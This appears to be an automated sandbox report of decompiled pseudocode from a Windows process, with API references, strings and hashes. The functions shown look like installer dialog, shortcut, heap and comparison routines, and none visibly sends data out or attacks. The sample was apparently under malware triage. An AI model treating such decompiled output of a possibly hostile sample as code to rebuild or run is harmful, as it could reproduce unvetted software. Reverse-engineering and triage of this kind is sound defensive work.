                                                								_t150 = _v44;
                                                								_v48 = (_t150 << 0x00000020 | _v48) >> 0xa;
                                                								_v44 = _t150 >> 0xa;
                                                								_v12 = 1;
                                                								_t158 = 0;
                                                								__eflags = 0;
                                                								L35:
                                                								_t168 = 0x400;
                                                								L36:
                                                								_t95 = E00404726(5);
                                                								if(_v12 != _t158) {
                                                									_t197 = _v44;
                                                									if(_t197 <= 0 && (_t197 < 0 || _v48 < _t95)) {
                                                										_v8 = 2;
                                                									}
                                                								}
                                                								_t147 =  *0x42371c; // 0x608bff
                                                								if( *((intOrPtr*)(_t147 + 0x10)) != _t158) {
                                                									E0040470E(0x3ff, 0xfffffffb, _t95);
                                                									if(_v12 == _t158) {
                                                										SetDlgItemTextA(_a4, _t168, 0x41f4f0);
                                                									} else {
                                                										E00404649(_t168, 0xfffffffc, _v48, _v44);
                                                									}
                                                								}
                                                								_t96 = _v8;
                                                								 *0x423fe4 = _t96;
                                                								if(_t96 == _t158) {
                                                									_v8 = E0040140B(7);
                                                								}
                                                								if(( *(_v32 + 0x14) & _t168) != 0) {
                                                									_v8 = _t158;
                                                								}
                                                								E00403E76(0 | _v8 == _t158);
                                                								if(_v8 == _t158 &&  *0x420524 == _t158) {
                                                									E00404227();
                                                								}
                                                								 *0x420524 = _t158;
                                                								goto L53;
                                                							}
                                                						}
                                                						_t185 = _a8 - 0x405;
                                                						if(_a8 != 0x405) {
                                                							goto L53;
                                                						}
                                                						goto L22;
                                                					}
                                                					_t118 = _a12 & 0x0000ffff;
                                                					if(_t118 != 0x3fb) {
                                                						L12:
                                                						if(_t118 == 0x3e9) {
                                                							_t152 = 7;
                                                							memset( &_v76, 0, _t152 << 2);
                                                							_v80 = _t166;
                                                							_v72 = 0x420538;
                                                							_v60 = E004045E3;
                                                							_v56 = _t146;
                                                							_v68 = E00405BBA(_t146, 0x420538, _t166, 0x41f908, _v12);
                                                							_t122 =  &_v80;
                                                							_v64 = 0x41;
                                                							__imp__SHBrowseForFolderA(_t122);
                                                							if(_t122 == 0) {
                                                								_a8 = 0x40f;
                                                							} else {
                                                								__imp__CoTaskMemFree(_t122);
                                                								E0040568B(_t146);
                                                								_t124 =  *0x423f50; // 0x601fd8
                                                								_t125 =  *((intOrPtr*)(_t124 + 0x11c));
                                                								if( *((intOrPtr*)(_t124 + 0x11c)) != 0 && _t146 == "C:\\Users\\Albus\\AppData\\Local\\Temp") {
                                                									E00405BBA(_t146, 0x420538, _t166, 0, _t125);
                                                									if(lstrcmpiA(0x422ee0, 0x420538) != 0) {
                                                										lstrcatA(_t146, 0x422ee0);
                                                									}
                                                								}
                                                								 *0x420524 =  *0x420524 + 1;
                                                								SetDlgItemTextA(_t166, 0x3fb, _t146);
                                                							}
                                                						}
                                                						goto L20;
                                                					}
                                                					if(_a12 >> 0x10 != 0x300) {
                                                						goto L53;
                                                					}
                                                					_a8 = 0x40f;
                                                					goto L12;
                                                				} else {
                                                					_t165 = GetDlgItem(_t166, 0x3fb);
                                                					if(E004056F8(_t146) != 0 && E0040571F(_t146) == 0) {
                                                						E0040568B(_t146);
                                                					}
                                                					 *0x423718 = _t166;
                                                					SetWindowTextA(_t165, _t146);
                                                					_push( *((intOrPtr*)(_a16 + 0x34)));
                                                					_push(1);
                                                					E00403E54(_t166);
                                                					_push( *((intOrPtr*)(_a16 + 0x30)));
                                                					_push(0x14);
                                                					E00403E54(_t166);
                                                					E00403E89(_t165);
                                                					_t138 = E00405F28(0xa);
                                                					if(_t138 == 0) {
                                                						L53:
                                                						return E00403EBB(_a8, _a12, _a16);
                                                					} else {
                                                						 *_t138(_t165, 1);
                                                						goto L8;
                                                					}
                                                				}
                                                			}


                                                APIs
                                                • GetDlgItem.USER32(?,000003FB), ref: 004042E1
                                                • SetWindowTextA.USER32(00000000,?), ref: 0040430B
                                                • SHBrowseForFolderA.SHELL32(?,0041F908,?), ref: 004043BC
                                                • CoTaskMemFree.OLE32(00000000), ref: 004043C7
                                                • lstrcmpiA.KERNEL32(pnzipglt,00420538,00000000,?,?), ref: 004043F9
                                                • lstrcatA.KERNEL32(?,pnzipglt), ref: 00404405
                                                • SetDlgItemTextA.USER32(?,000003FB,?), ref: 00404417
                                                  • Part of subcall function 0040543D: GetDlgItemTextA.USER32 ref: 00405450
                                                  • Part of subcall function 00405DFA: CharNextA.USER32(?), ref: 00405E52
                                                  • Part of subcall function 00405DFA: CharNextA.USER32(?), ref: 00405E5F
                                                  • Part of subcall function 00405DFA: CharNextA.USER32(?), ref: 00405E64
                                                  • Part of subcall function 00405DFA: CharPrevA.USER32(?,?), ref: 00405E74
                                                • GetDiskFreeSpaceA.KERNEL32(0041F500,?,?,0000040F,?,0041F500,0041F500,?,00000001,0041F500,?,?,000003FB,?), ref: 004044D5
                                                • MulDiv.KERNEL32 ref: 004044F0
                                                  • Part of subcall function 00404649: lstrlenA.KERNEL32(00420538,00420538,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,00404564,000000DF,00000000,00000400,?), ref: 004046E7
                                                  • Part of subcall function 00404649: wsprintfA.USER32 ref: 004046EF
                                                  • Part of subcall function 00404649: SetDlgItemTextA.USER32(?,00420538), ref: 00404702
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.493663175.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000004.00000002.493656469.0000000000400000.00000002.00020000.sdmp
                                                • Associated: 00000004.00000002.493675836.0000000000407000.00000002.00020000.sdmp
                                                • Associated: 00000004.00000002.493685746.0000000000409000.00000004.00020000.sdmp
                                                • Associated: 00000004.00000002.493695957.0000000000422000.00000004.00020000.sdmp
                                                • Associated: 00000004.00000002.493705633.000000000042A000.00000004.00020000.sdmp
                                                • Associated: 00000004.00000002.493715125.000000000042D000.00000002.00020000.sdmp
                                                Similarity
                                                • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                • String ID: A$C:\Users\user\AppData\Local\Temp$pnzipglt
                                                • API String ID: 2624150263-545010280
                                                • Opcode ID: fb58f5be01c1fbab376fe3aca88381438e011d3cf0c95fbb8aa79c4ccef87f62
                                                • Instruction ID: cfccd4b73e861dd9bc9b7885d3f414f2f86db1ffcc16c92a650f1104495a78a5
                                                • Opcode Fuzzy Hash: fb58f5be01c1fbab376fe3aca88381438e011d3cf0c95fbb8aa79c4ccef87f62
                                                • Instruction Fuzzy Hash: EAA17EB1D00218BBDB11AFA5CD41AAFB6B8EF84315F10813BF605B62D1D77C9A418F69
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 74%
                                                			E00402053() {
                                                				void* _t44;
                                                				intOrPtr* _t48;
                                                				intOrPtr* _t50;
                                                				intOrPtr* _t52;
                                                				intOrPtr* _t54;
                                                				signed int _t58;
                                                				intOrPtr* _t59;
                                                				intOrPtr* _t62;
                                                				intOrPtr* _t64;
                                                				intOrPtr* _t66;
                                                				intOrPtr* _t69;
                                                				intOrPtr* _t71;
                                                				int _t75;
                                                				signed int _t81;
                                                				intOrPtr* _t88;
                                                				void* _t95;
                                                				void* _t96;
                                                				void* _t100;
                                                
                                                				 *(_t100 - 0x30) = E00402A29(0xfffffff0);
                                                				_t96 = E00402A29(0xffffffdf);
                                                				 *((intOrPtr*)(_t100 - 0x34)) = E00402A29(2);
                                                				 *((intOrPtr*)(_t100 - 0xc)) = E00402A29(0xffffffcd);
                                                				 *((intOrPtr*)(_t100 - 0x38)) = E00402A29(0x45);
                                                				if(E004056F8(_t96) == 0) {
                                                					E00402A29(0x21);
                                                				}
                                                				_t44 = _t100 + 8;
                                                				__imp__CoCreateInstance(0x4073f8, _t75, 1, 0x4073e8, _t44);
                                                				if(_t44 < _t75) {
                                                					L13:
                                                					 *((intOrPtr*)(_t100 - 4)) = 1;
                                                					_push(0xfffffff0);
                                                				} else {
                                                					_t48 =  *((intOrPtr*)(_t100 + 8));
                                                					_t95 =  *((intOrPtr*)( *_t48))(_t48, 0x407408, _t100 - 8);
                                                					if(_t95 >= _t75) {
                                                						_t52 =  *((intOrPtr*)(_t100 + 8));
                                                						_t95 =  *((intOrPtr*)( *_t52 + 0x50))(_t52, _t96);
                                                						_t54 =  *((intOrPtr*)(_t100 + 8));
                                                						 *((intOrPtr*)( *_t54 + 0x24))(_t54, "C:\\Users\\Albus\\AppData\\Local\\Temp");
                                                						_t81 =  *(_t100 - 0x18);
                                                						_t58 = _t81 >> 0x00000008 & 0x000000ff;
                                                						if(_t58 != 0) {
                                                							_t88 =  *((intOrPtr*)(_t100 + 8));
                                                							 *((intOrPtr*)( *_t88 + 0x3c))(_t88, _t58);
                                                							_t81 =  *(_t100 - 0x18);
                                                						}
                                                						_t59 =  *((intOrPtr*)(_t100 + 8));
                                                						 *((intOrPtr*)( *_t59 + 0x34))(_t59, _t81 >> 0x10);
                                                						if( *((intOrPtr*)( *((intOrPtr*)(_t100 - 0xc)))) != _t75) {
                                                							_t71 =  *((intOrPtr*)(_t100 + 8));
                                                							 *((intOrPtr*)( *_t71 + 0x44))(_t71,  *((intOrPtr*)(_t100 - 0xc)),  *(_t100 - 0x18) & 0x000000ff);
                                                						}
                                                						_t62 =  *((intOrPtr*)(_t100 + 8));
                                                						 *((intOrPtr*)( *_t62 + 0x2c))(_t62,  *((intOrPtr*)(_t100 - 0x34)));
                                                						_t64 =  *((intOrPtr*)(_t100 + 8));
                                                						 *((intOrPtr*)( *_t64 + 0x1c))(_t64,  *((intOrPtr*)(_t100 - 0x38)));
                                                						if(_t95 >= _t75) {
                                                							_t95 = 0x80004005;
                                                							if(MultiByteToWideChar(_t75, _t75,  *(_t100 - 0x30), 0xffffffff, 0x409408, 0x400) != 0) {
                                                								_t69 =  *((intOrPtr*)(_t100 - 8));
                                                								_t95 =  *((intOrPtr*)( *_t69 + 0x18))(_t69, 0x409408, 1);
                                                							}
                                                						}
                                                						_t66 =  *((intOrPtr*)(_t100 - 8));
                                                						 *((intOrPtr*)( *_t66 + 8))(_t66);
                                                					}
                                                					_t50 =  *((intOrPtr*)(_t100 + 8));
                                                					 *((intOrPtr*)( *_t50 + 8))(_t50);
                                                					if(_t95 >= _t75) {
                                                						_push(0xfffffff4);
                                                					} else {
                                                						goto L13;
                                                					}
                                                				}
                                                				E00401423();
                                                				 *0x423fc8 =  *0x423fc8 +  *((intOrPtr*)(_t100 - 4));
                                                				return 0;
                                                			}






















                                                APIs
                                                • CoCreateInstance.OLE32(004073F8,?,00000001,004073E8,?), ref: 004020A6
                                                • MultiByteToWideChar.KERNEL32(?,?,?,000000FF,00409408,00000400,?,00000001,004073E8,?,00000000,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402160
                                                Strings
                                                • C:\Users\user\AppData\Local\Temp, xrefs: 004020DE
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.493663175.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000004.00000002.493656469.0000000000400000.00000002.00020000.sdmp
                                                • Associated: 00000004.00000002.493675836.0000000000407000.00000002.00020000.sdmp
                                                • Associated: 00000004.00000002.493685746.0000000000409000.00000004.00020000.sdmp
                                                • Associated: 00000004.00000002.493695957.0000000000422000.00000004.00020000.sdmp
                                                • Associated: 00000004.00000002.493705633.000000000042A000.00000004.00020000.sdmp
                                                • Associated: 00000004.00000002.493715125.000000000042D000.00000002.00020000.sdmp
                                                Similarity
                                                • API ID: ByteCharCreateInstanceMultiWide
                                                • String ID: C:\Users\user\AppData\Local\Temp
                                                • API String ID: 123533781-2935972921
                                                • Opcode ID: 089d45c0d23cda86f3d168a15e68d27aa0b28459bfa4feaba1da871340bdcdc6
                                                • Instruction ID: c7e9304a010c998f9a7959bd005017a1970e80d3ce8bb7043a01564e87abbd95
                                                • Opcode Fuzzy Hash: 089d45c0d23cda86f3d168a15e68d27aa0b28459bfa4feaba1da871340bdcdc6
                                                • Instruction Fuzzy Hash: 32416E75A00205BFCB00DFA8CD88E9E7BB5EF49354F204169F905EB2D1CA799C41CB94
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E10009B60(struct _EXCEPTION_POINTERS* _a4) {
                                                
                                                				SetUnhandledExceptionFilter(0);
                                                				return UnhandledExceptionFilter(_a4);
                                                			}



                                                0x10009b65
                                                0x10009b75

                                                APIs
                                                • SetUnhandledExceptionFilter.KERNEL32 ref: 10009B65
                                                • UnhandledExceptionFilter.KERNEL32(?), ref: 10009B6E
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.497246318.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000004.00000002.497232899.0000000010000000.00000002.00020000.sdmp
                                                • Associated: 00000004.00000002.497307012.0000000010014000.00000002.00020000.sdmp
                                                • Associated: 00000004.00000002.497331845.000000001001A000.00000004.00020000.sdmp
                                                • Associated: 00000004.00000002.497358884.000000001001F000.00000002.00020000.sdmp
                                                Similarity
                                                • API ID: ExceptionFilterUnhandled
                                                • String ID:
                                                • API String ID: 3192549508-0
                                                • Opcode ID: b0fbea0425f4393a36563239932169be80c10f585de93763198afdd62a15c69d
                                                • Instruction ID: 94b90477b30676bec5174d0c86af08d776f4734dad835d80667522a9045ad030
                                                • Opcode Fuzzy Hash: b0fbea0425f4393a36563239932169be80c10f585de93763198afdd62a15c69d
                                                • Instruction Fuzzy Hash: 64B09231184218ABFB402BE1DC89B583F28FF04752F808412F60E44860CB7397519B92
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 39%
                                                			E00402671(char __ebx, char* __edi, char* __esi) {
                                                				void* _t19;
                                                
                                                				if(FindFirstFileA(E00402A29(2), _t19 - 0x19c) != 0xffffffff) {
                                                					E00405AF6(__edi, _t6);
                                                					_push(_t19 - 0x170);
                                                					_push(__esi);
                                                					E00405B98();
                                                				} else {
                                                					 *__edi = __ebx;
                                                					 *__esi = __ebx;
                                                					 *((intOrPtr*)(_t19 - 4)) = 1;
                                                				}
                                                				 *0x423fc8 =  *0x423fc8 +  *((intOrPtr*)(_t19 - 4));
                                                				return 0;
                                                			}





                                                APIs
                                                • FindFirstFileA.KERNEL32(00000000,?,00000002), ref: 00402680
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.493663175.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000004.00000002.493656469.0000000000400000.00000002.00020000.sdmp
                                                • Associated: 00000004.00000002.493675836.0000000000407000.00000002.00020000.sdmp
                                                • Associated: 00000004.00000002.493685746.0000000000409000.00000004.00020000.sdmp
                                                • Associated: 00000004.00000002.493695957.0000000000422000.00000004.00020000.sdmp
                                                • Associated: 00000004.00000002.493705633.000000000042A000.00000004.00020000.sdmp
                                                • Associated: 00000004.00000002.493715125.000000000042D000.00000002.00020000.sdmp
                                                Similarity
                                                • API ID: FileFindFirst
                                                • String ID:
                                                • API String ID: 1974802433-0
                                                • Opcode ID: c707d325fcd64eef76be24f413fce74fcf29a9d2c757c0b7f3e21b108dde0476
                                                • Instruction ID: c4b8fb32876d586bcf7df686e34757fa561d471cbaf363f6388d0c393702730c
                                                • Opcode Fuzzy Hash: c707d325fcd64eef76be24f413fce74fcf29a9d2c757c0b7f3e21b108dde0476
                                                • Instruction Fuzzy Hash: 81F0A032A041009ED711EBA49A499EEB7789B11318F60067BE101B21C1C6B859459B2A
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E100098C2() {
                                                				void* _t3;
                                                
                                                				_t3 = GetProcessHeap();
                                                				 *0x1001dc40 = _t3;
                                                				return 0 | _t3 != 0x00000000;
                                                			}




                                                0x100098c2
                                                0x100098ca
                                                0x100098d6

                                                APIs
                                                • GetProcessHeap.KERNEL32(10012851,100196A0,00000008,10012A29,?,00000001,?,100196C0,0000000C,10012AF9,?,00000001,?), ref: 100098C2
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.497246318.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000004.00000002.497232899.0000000010000000.00000002.00020000.sdmp
                                                • Associated: 00000004.00000002.497307012.0000000010014000.00000002.00020000.sdmp
                                                • Associated: 00000004.00000002.497331845.000000001001A000.00000004.00020000.sdmp
                                                • Associated: 00000004.00000002.497358884.000000001001F000.00000002.00020000.sdmp
                                                Similarity
                                                • API ID: HeapProcess
                                                • String ID:
                                                • API String ID: 54951025-0
                                                • Opcode ID: 646ed7e559294f34beebc0a5efae545b15c0726d8fd9449b8ef5808d19fbfaa0
                                                • Instruction ID: 330df4dff84b760c4d3e3547b96fb622717a589370fd0182969ad5b4638ea4ad
                                                • Opcode Fuzzy Hash: 646ed7e559294f34beebc0a5efae545b15c0726d8fd9449b8ef5808d19fbfaa0
                                                • Instruction Fuzzy Hash: 15B012F030212347E70C5B385CA501939D46748201304803EF003C5160DF30C550EB00
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E100066F2(void* __edx, void* __esi) {
                                                				signed int _t192;
                                                				signed char _t193;
                                                				signed char _t194;
                                                				signed char _t195;
                                                				signed char _t196;
                                                				signed char _t198;
                                                				signed int _t241;
                                                				void* _t287;
                                                				void* _t292;
                                                				void* _t294;
                                                				void* _t296;
                                                				void* _t298;
                                                				void* _t300;
                                                				void* _t302;
                                                				void* _t304;
                                                				void* _t306;
                                                				void* _t308;
                                                				void* _t310;
                                                				void* _t312;
                                                				void* _t314;
                                                				void* _t316;
                                                				void* _t318;
                                                				void* _t320;
                                                				void* _t322;
                                                				void* _t324;
                                                				void* _t326;
                                                				void* _t327;
                                                
                                                				_t327 = __esi;
                                                				_t287 = __edx;
                                                				if( *((intOrPtr*)(__esi - 0x1e)) ==  *((intOrPtr*)(__edx - 0x1e))) {
                                                					_t241 = 0;
                                                					L15:
                                                					if(_t241 != 0) {
                                                						goto L2;
                                                					}
                                                					_t193 =  *(_t327 - 0x1a);
                                                					if(_t193 ==  *(_t287 - 0x1a)) {
                                                						_t241 = 0;
                                                						L26:
                                                						if(_t241 != 0) {
                                                							goto L2;
                                                						}
                                                						_t194 =  *(_t327 - 0x16);
                                                						if(_t194 ==  *(_t287 - 0x16)) {
                                                							_t241 = 0;
                                                							L37:
                                                							if(_t241 != 0) {
                                                								goto L2;
                                                							}
                                                							_t195 =  *(_t327 - 0x12);
                                                							if(_t195 ==  *(_t287 - 0x12)) {
                                                								_t241 = 0;
                                                								L48:
                                                								if(_t241 != 0) {
                                                									goto L2;
                                                								}
                                                								_t196 =  *(_t327 - 0xe);
                                                								if(_t196 ==  *(_t287 - 0xe)) {
                                                									_t241 = 0;
                                                									L59:
                                                									if(_t241 != 0) {
                                                										goto L2;
                                                									}
                                                									if( *(_t327 - 0xa) ==  *(_t287 - 0xa)) {
                                                										_t241 = 0;
                                                										L70:
                                                										if(_t241 != 0) {
                                                											goto L2;
                                                										}
                                                										_t198 =  *(_t327 - 6);
                                                										if(_t198 ==  *(_t287 - 6)) {
                                                											_t241 = 0;
                                                											L81:
                                                											if(_t241 == 0 &&  *((intOrPtr*)(_t327 - 2)) ==  *((intOrPtr*)(_t287 - 2))) {
                                                											}
                                                											goto L2;
                                                										}
                                                										_t292 = (_t198 & 0x000000ff) - ( *(_t287 - 6) & 0x000000ff);
                                                										if(_t292 == 0) {
                                                											L74:
                                                											_t294 = ( *(_t327 - 5) & 0x000000ff) - ( *(_t287 - 5) & 0x000000ff);
                                                											if(_t294 == 0) {
                                                												L76:
                                                												_t296 = ( *(_t327 - 4) & 0x000000ff) - ( *(_t287 - 4) & 0x000000ff);
                                                												if(_t296 == 0) {
                                                													L78:
                                                													_t241 = ( *(_t327 - 3) & 0x000000ff) - ( *(_t287 - 3) & 0x000000ff);
                                                													if(_t241 != 0) {
                                                														_t241 = (0 | _t241 > 0x00000000) * 2 - 1;
                                                													}
                                                													goto L81;
                                                												}
                                                												_t241 = (0 | _t296 > 0x00000000) * 2 - 1;
                                                												if(_t241 != 0) {
                                                													goto L2;
                                                												}
                                                												goto L78;
                                                											}
                                                											_t241 = (0 | _t294 > 0x00000000) * 2 - 1;
                                                											if(_t241 != 0) {
                                                												goto L2;
                                                											}
                                                											goto L76;
                                                										}
                                                										_t241 = (0 | _t292 > 0x00000000) * 2 - 1;
                                                										if(_t241 != 0) {
                                                											goto L2;
                                                										}
                                                										goto L74;
                                                									}
                                                									_t298 = ( *(_t327 - 0xa) & 0x000000ff) - ( *(_t287 - 0xa) & 0x000000ff);
                                                									if(_t298 == 0) {
                                                										L63:
                                                										_t300 = ( *(_t327 - 9) & 0x000000ff) - ( *(_t287 - 9) & 0x000000ff);
                                                										if(_t300 == 0) {
                                                											L65:
                                                											_t302 = ( *(_t327 - 8) & 0x000000ff) - ( *(_t287 - 8) & 0x000000ff);
                                                											if(_t302 == 0) {
                                                												L67:
                                                												_t241 = ( *(_t327 - 7) & 0x000000ff) - ( *(_t287 - 7) & 0x000000ff);
                                                												if(_t241 != 0) {
                                                													_t241 = (0 | _t241 > 0x00000000) * 2 - 1;
                                                												}
                                                												goto L70;
                                                											}
                                                											_t241 = (0 | _t302 > 0x00000000) * 2 - 1;
                                                											if(_t241 != 0) {
                                                												goto L2;
                                                											}
                                                											goto L67;
                                                										}
                                                										_t241 = (0 | _t300 > 0x00000000) * 2 - 1;
                                                										if(_t241 != 0) {
                                                											goto L2;
                                                										}
                                                										goto L65;
                                                									}
                                                									_t241 = (0 | _t298 > 0x00000000) * 2 - 1;
                                                									if(_t241 != 0) {
                                                										goto L2;
                                                									}
                                                									goto L63;
                                                								}
                                                								_t304 = (_t196 & 0x000000ff) - ( *(_t287 - 0xe) & 0x000000ff);
                                                								if(_t304 == 0) {
                                                									L52:
                                                									_t306 = ( *(_t327 - 0xd) & 0x000000ff) - ( *(_t287 - 0xd) & 0x000000ff);
                                                									if(_t306 == 0) {
                                                										L54:
                                                										_t308 = ( *(_t327 - 0xc) & 0x000000ff) - ( *(_t287 - 0xc) & 0x000000ff);
                                                										if(_t308 == 0) {
                                                											L56:
                                                											_t241 = ( *(_t327 - 0xb) & 0x000000ff) - ( *(_t287 - 0xb) & 0x000000ff);
                                                											if(_t241 != 0) {
                                                												_t241 = (0 | _t241 > 0x00000000) * 2 - 1;
                                                											}
                                                											goto L59;
                                                										}
                                                										_t241 = (0 | _t308 > 0x00000000) * 2 - 1;
                                                										if(_t241 != 0) {
                                                											goto L2;
                                                										}
                                                										goto L56;
                                                									}
                                                									_t241 = (0 | _t306 > 0x00000000) * 2 - 1;
                                                									if(_t241 != 0) {
                                                										goto L2;
                                                									}
                                                									goto L54;
                                                								}
                                                								_t241 = (0 | _t304 > 0x00000000) * 2 - 1;
                                                								if(_t241 != 0) {
                                                									goto L2;
                                                								}
                                                								goto L52;
                                                							}
                                                							_t310 = (_t195 & 0x000000ff) - ( *(_t287 - 0x12) & 0x000000ff);
                                                							if(_t310 == 0) {
                                                								L41:
                                                								_t312 = ( *(_t327 - 0x11) & 0x000000ff) - ( *(_t287 - 0x11) & 0x000000ff);
                                                								if(_t312 == 0) {
                                                									L43:
                                                									_t314 = ( *(_t327 - 0x10) & 0x000000ff) - ( *(_t287 - 0x10) & 0x000000ff);
                                                									if(_t314 == 0) {
                                                										L45:
                                                										_t241 = ( *(_t327 - 0xf) & 0x000000ff) - ( *(_t287 - 0xf) & 0x000000ff);
                                                										if(_t241 != 0) {
                                                											_t241 = (0 | _t241 > 0x00000000) * 2 - 1;
                                                										}
                                                										goto L48;
                                                									}
                                                									_t241 = (0 | _t314 > 0x00000000) * 2 - 1;
                                                									if(_t241 != 0) {
                                                										goto L2;
                                                									}
                                                									goto L45;
                                                								}
                                                								_t241 = (0 | _t312 > 0x00000000) * 2 - 1;
                                                								if(_t241 != 0) {
                                                									goto L2;
                                                								}
                                                								goto L43;
                                                							}
                                                							_t241 = (0 | _t310 > 0x00000000) * 2 - 1;
                                                							if(_t241 != 0) {
                                                								goto L2;
                                                							}
                                                							goto L41;
                                                						}
                                                						_t316 = (_t194 & 0x000000ff) - ( *(_t287 - 0x16) & 0x000000ff);
                                                						if(_t316 == 0) {
                                                							L30:
                                                							_t318 = ( *(_t327 - 0x15) & 0x000000ff) - ( *(_t287 - 0x15) & 0x000000ff);
                                                							if(_t318 == 0) {
                                                								L32:
                                                								_t320 = ( *(_t327 - 0x14) & 0x000000ff) - ( *(_t287 - 0x14) & 0x000000ff);
                                                								if(_t320 == 0) {
                                                									L34:
                                                									_t241 = ( *(_t327 - 0x13) & 0x000000ff) - ( *(_t287 - 0x13) & 0x000000ff);
                                                									if(_t241 != 0) {
                                                										_t241 = (0 | _t241 > 0x00000000) * 2 - 1;
                                                									}
                                                									goto L37;
                                                								}
                                                								_t241 = (0 | _t320 > 0x00000000) * 2 - 1;
                                                								if(_t241 != 0) {
                                                									goto L2;
                                                								}
                                                								goto L34;
                                                							}
                                                							_t241 = (0 | _t318 > 0x00000000) * 2 - 1;
                                                							if(_t241 != 0) {
                                                								goto L2;
                                                							}
                                                							goto L32;
                                                						}
                                                						_t241 = (0 | _t316 > 0x00000000) * 2 - 1;
                                                						if(_t241 != 0) {
                                                							goto L2;
                                                						}
                                                						goto L30;
                                                					}
                                                					_t322 = (_t193 & 0x000000ff) - ( *(_t287 - 0x1a) & 0x000000ff);
                                                					if(_t322 == 0) {
                                                						L19:
                                                						_t324 = ( *(_t327 - 0x19) & 0x000000ff) - ( *(_t287 - 0x19) & 0x000000ff);
                                                						if(_t324 == 0) {
                                                							L21:
                                                							_t326 = ( *(_t327 - 0x18) & 0x000000ff) - ( *(_t287 - 0x18) & 0x000000ff);
                                                							if(_t326 == 0) {
                                                								L23:
                                                								_t241 = ( *(_t327 - 0x17) & 0x000000ff) - ( *(_t287 - 0x17) & 0x000000ff);
                                                								if(_t241 != 0) {
                                                									_t241 = (0 | _t241 > 0x00000000) * 2 - 1;
                                                								}
                                                								goto L26;
                                                							}
                                                							_t241 = (0 | _t326 > 0x00000000) * 2 - 1;
                                                							if(_t241 != 0) {
                                                								goto L2;
                                                							}
                                                							goto L23;
                                                						}
                                                						_t241 = (0 | _t324 > 0x00000000) * 2 - 1;
                                                						if(_t241 != 0) {
                                                							goto L2;
                                                						}
                                                						goto L21;
                                                					}
                                                					_t241 = (0 | _t322 > 0x00000000) * 2 - 1;
                                                					if(_t241 != 0) {
                                                						goto L2;
                                                					}
                                                					goto L19;
                                                				} else {
                                                					__edi = __al & 0x000000ff;
                                                					__edi = (__al & 0x000000ff) - ( *(__edx - 0x1e) & 0x000000ff);
                                                					if(__edi == 0) {
                                                						L8:
                                                						__edi =  *(__esi - 0x1d) & 0x000000ff;
                                                						__edi = ( *(__esi - 0x1d) & 0x000000ff) - ( *(__edx - 0x1d) & 0x000000ff);
                                                						if(__edi == 0) {
                                                							L10:
                                                							__edi =  *(__esi - 0x1c) & 0x000000ff;
                                                							__edi = ( *(__esi - 0x1c) & 0x000000ff) - ( *(__edx - 0x1c) & 0x000000ff);
                                                							if(__edi == 0) {
                                                								L12:
                                                								__ecx =  *(__esi - 0x1b) & 0x000000ff;
                                                								__ecx = ( *(__esi - 0x1b) & 0x000000ff) - ( *(__edx - 0x1b) & 0x000000ff);
                                                								if(__ecx != 0) {
                                                									__ecx = (0 | __ecx > 0x00000000) * 2 - 1;
                                                								}
                                                								goto L15;
                                                							}
                                                							0 = 0 | __edi > 0x00000000;
                                                							__ecx = (__edi > 0) * 2 != 1;
                                                							if((__edi > 0) * 2 != 1) {
                                                								L2:
                                                								_t192 = _t241;
                                                								return _t192;
                                                							}
                                                							goto L12;
                                                						}
                                                						0 = 0 | __edi > 0x00000000;
                                                						__ecx = (__edi > 0) * 2 != 1;
                                                						if((__edi > 0) * 2 != 1) {
                                                							goto L2;
                                                						}
                                                						goto L10;
                                                					}
                                                					0 = 0 | __edi > 0x00000000;
                                                					__ecx = (__edi > 0) * 2 != 1;
                                                					if((__edi > 0) * 2 != 1) {
                                                						goto L2;
                                                					}
                                                					goto L8;
                                                				}
                                                			}































                                                Memory Dump Source
                                                • Source File: 00000004.00000002.497246318.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000004.00000002.497232899.0000000010000000.00000002.00020000.sdmp
                                                • Associated: 00000004.00000002.497307012.0000000010014000.00000002.00020000.sdmp
                                                • Associated: 00000004.00000002.497331845.000000001001A000.00000004.00020000.sdmp
                                                • Associated: 00000004.00000002.497358884.000000001001F000.00000002.00020000.sdmp
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                                                • Instruction ID: 59b9ccafa3af49cd88bbdd7374fc6b5821e1434ac54296cd17ea50948520c0ff
                                                • Opcode Fuzzy Hash: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                                                • Instruction Fuzzy Hash: 9FC1633220959309EB4DCA79887413EBBE2DB966F1327576DD4B2DF1D8EF20C524DA20
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000004.00000002.497331845.000000001001A000.00000004.00020000.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000004.00000002.497232899.0000000010000000.00000002.00020000.sdmp
                                                • Associated: 00000004.00000002.497246318.0000000010001000.00000020.00020000.sdmp
                                                • Associated: 00000004.00000002.497307012.0000000010014000.00000002.00020000.sdmp
                                                • Associated: 00000004.00000002.497358884.000000001001F000.00000002.00020000.sdmp
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
